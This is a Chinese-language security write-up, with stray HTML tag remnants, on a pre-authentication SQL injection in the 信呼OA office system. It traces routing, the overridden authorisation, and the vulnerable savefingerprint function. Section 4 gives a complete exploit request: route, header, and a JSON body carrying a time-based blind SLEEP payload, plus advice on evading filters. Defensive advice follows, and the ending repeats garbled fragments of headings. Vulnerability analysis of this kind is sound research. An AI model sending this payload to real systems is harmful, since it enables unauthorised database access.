信呼OA前台SQL注入漏洞分析与利用<\/h1>

1. 系统框架与路由分析<\/h2>

1.1 入口文件分析<\/h3>
系统入口文件为index.php<\/code>，主要包含以下关键组件：<\/p>

config.php<\/code>：包含数据库配置文件<\/li>
rockClass<\/code>类：提供基础过滤功能<\/li>
<\/ul>
1.2 路由处理机制<\/h3>
路由处理主要通过以下流程：<\/p>


获取URL参数：<\/p>
$_uurl =<\/span> $rock-><\/span>get<\/span>('rewriteurl'<\/span>);
<\/span><\/span><\/code><\/pre><\/li>

get<\/code>函数处理逻辑：<\/p>

参数可控，第一个参数为GET参数名<\/li>
经过jmuncode<\/code>函数处理<\/li>
包含SQL注入和XSS防御机制<\/li>
<\/ul>
<\/li>

路由解析：<\/p>

如果$_uurl<\/code>不为空，清除m,d,a<\/code>参数<\/li>
将$_uurl<\/code>赋值给$m<\/code>，并以_<\/code>为分隔符解析为数组<\/li>
<\/ul>
<\/li>

最终包含view.php<\/code>进行路由分发<\/p>
<\/li>
<\/ol>
1.3 路由格式解析<\/h3>
路由格式主要通过以下参数控制：<\/p>

$p<\/code>：固定为webmain<\/code><\/li>
$m<\/code>：模块名，格式可为123|abc<\/code>（123为$m<\/code>，abc为$_m<\/code>）<\/li>
$d<\/code>：目录名<\/li>
$a<\/code>：方法名<\/li>
$ajaxbool<\/code>：决定调用Ajax<\/code>还是Action<\/code>方法<\/li>
<\/ul>
路由示例1（登录）：<\/strong><\/p>
?m=login
对应文件：webmain\/login\/loginAction.php
方法：check (ajaxbool=true)
<\/code><\/pre>
路由示例2（多级目录）：<\/strong><\/p>
?a=getrecord&d=task&m=reim|api&ajaxbool=false
对应文件：webmain\/task\/api\/reimAction.php
方法：getrecordAction
<\/code><\/pre>
2. 鉴权机制分析<\/h2>
系统主要有三类父类实现鉴权：<\/p>
2.1 apiAction类<\/h3>

使用initAction<\/code>方法鉴权<\/li>
子类示例：deptClassAction<\/code><\/li>
自动触发initAction<\/code>方法<\/li>
<\/ul>
2.2 openapiAction类<\/h3>

同样使用initAction<\/code>方法鉴权<\/li>
比较传入的openkey<\/code>与数据库值<\/li>
<\/ul>
2.3 Action类<\/h3>

使用initProject<\/code>方法鉴权<\/li>
在构造函数中自动触发<\/li>
<\/ul>
重要特性<\/strong>：子类可以重写父类的鉴权方法，如果子类重写了鉴权方法，则执行子类的方法。<\/p>
3. 漏洞分析<\/h2>
3.1 漏洞位置<\/h3>
漏洞位于：<\/p>
webmain\/model\/kqjcmdModel.php
<\/code><\/pre>
中的savefingerprint<\/code>函数<\/p>
3.2 漏洞参数<\/h3>

可控参数：

$uid<\/code>：完全可控<\/li>
$snid<\/code>：可控但做了int转换<\/li>
<\/ul>
<\/li>
<\/ul>
3.3 漏洞触发链<\/h3>


调用流程：<\/p>
postdata() -> savefingerprint() -> rows()
<\/code><\/pre>
<\/li>

关键调用点：<\/p>

webmain\/task\/openapi\/openkqjAction.php<\/code>中的initAction<\/code>方法<\/li>
该方法重写了父类的鉴权方法，导致未授权访问<\/li>
<\/ul>
<\/li>
<\/ol>
3.4 漏洞利用条件<\/h3>


请求头设置：<\/p>
Content-Type: application\/json
<\/code><\/pre>
<\/li>

POST数据要求：<\/p>

需要满足if($dtype=='fingerprint')<\/code>条件<\/li>
需要两层JSON结构：
{
<\/span><\/span>    "data"<\/span>: {
<\/span><\/span>        "dtype"<\/span>: "fingerprint"<\/span>,
<\/span><\/span>        "ccid"<\/span>: "注入点"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
4. 漏洞复现与利用<\/h2>
4.1 利用步骤<\/h3>


构造请求路由：<\/p>
POST \/index.php?a=savefingerprint&d=task&m=openkqj|openapi&ajaxbool=true
<\/code><\/pre>
<\/li>

设置请求头：<\/p>
Content-Type: application\/json
<\/code><\/pre>
<\/li>

构造恶意POST数据：<\/p>
{
<\/span><\/span>    "data"<\/span>: {
<\/span><\/span>        "dtype"<\/span>: "fingerprint"<\/span>,
<\/span><\/span>        "ccid"<\/span>: "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)-- "<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
4.2 注入点说明<\/h3>

ccid<\/code>参数存在SQL注入<\/li>
由于系统有基础过滤，需要绕过：

使用报错注入或时间盲注<\/li>
避免使用明显的关键字<\/li>
<\/ul>
<\/li>
<\/ul>
5. 防御建议<\/h2>


代码层面：<\/p>

对ccid<\/code>参数进行严格的类型检查和过滤<\/li>
避免在模型中直接拼接SQL语句<\/li>
<\/ul>
<\/li>

架构层面：<\/p>

统一鉴权机制，避免子类随意重写<\/li>
使用预编译语句或ORM框架<\/li>
<\/ul>
<\/li>

运维层面：<\/p>

及时更新补丁<\/li>
部署WAF防护<\/li>
<\/ul>
<\/li>
<\/ol>
6. 总结<\/h2>
该漏洞源于：<\/p>

鉴权方法可被重写导致未授权访问<\/li>
模型层直接拼接用户输入导致SQL注入<\/li>
参数过滤不严格<\/li>
<\/ol>
利用该漏洞需要：<\/p>

正确构造路由<\/li>
设置特定的Content-Type<\/li>
构造多层JSON结构<\/li>
在ccid<\/code>参数处注入<\/li>
<\/ul>
信呼OA前台SQL注入漏洞分析与利用<\/h1>

1. 系统框架与路由分析<\/h2>

2. 鉴权机制分析<\/h2> 系统主要有三类父类实现鉴权：<\/p>

4. 漏洞复现与利用<\/h2>

2. 鉴权机制分析<\/h2>
系统主要有三类父类实现鉴权：<\/p>
